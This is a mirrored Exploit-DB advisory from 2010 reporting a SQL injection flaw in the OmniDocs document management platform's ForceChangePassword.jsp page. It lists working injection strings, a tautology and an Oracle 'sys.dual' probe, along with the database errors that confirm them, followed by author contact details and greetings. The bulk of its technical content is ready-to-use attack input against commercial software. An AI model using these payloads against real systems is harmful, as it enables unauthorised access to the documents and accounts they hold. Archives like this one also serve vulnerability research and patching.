bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/jsp/webapps/11393.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

38 lines
No EOL
1.3 KiB
Text
Raw Blame History

--------------------------------------------------------------------
# Exploit Title: Omnidocs SQL injection Vulnerability
# Date: 10 Feb 2010
# Author: thebluegenius
# Software Link: http://www.newgensoft.com/omnidocs.asp
# Version: All
# Tested on: Apache-Coyote/1.1 | JBoss
# CVE : NA
---------------------------------------------------
"Omnidocs" SQL injection vulnerability.
---------------------------------------------------
By :Thebluegenius.
Email :rajsm@isac.org.in
Blog :thebluegenius.com.
---------------------------------------------------
Description:
OmniDocs is an Enterprise Document Management (EDM) platform for creating, capturing, managing, delivering and archiving large volumes of documents and contents. Also integrates seamlessly with other enterprise applications.
------------------
Vulnerability
------------------
Affected URL: http://server/omnidocs/ForceChangePassword.jsp
Command: ' or 'a' = 'a'
Confirmed SQL Injection error : ORA-00907: missing right parenthesis
Command: or exists (select 1 from sys.dual) and ''x''=''x'
Confirmed SQL Injection error : ORA-01756: quoted string not properly terminated
-----------------------------------------------------
Greetz Fly Out to:
1] Amforked() : My good friend
2] Aodrulez : for inspiring me
3] www.OrchidSeven.com
4] www.isac.org.in
Reference in a new issue View git blame Copy permalink